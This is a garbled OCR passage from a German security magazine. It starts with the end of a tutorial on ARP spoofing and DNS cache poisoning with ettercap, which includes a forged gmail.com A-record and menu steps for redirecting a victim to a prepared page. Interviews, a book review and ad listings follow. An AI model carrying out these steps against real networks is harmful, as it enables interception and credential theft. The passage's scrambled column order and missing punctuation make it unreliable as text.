nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
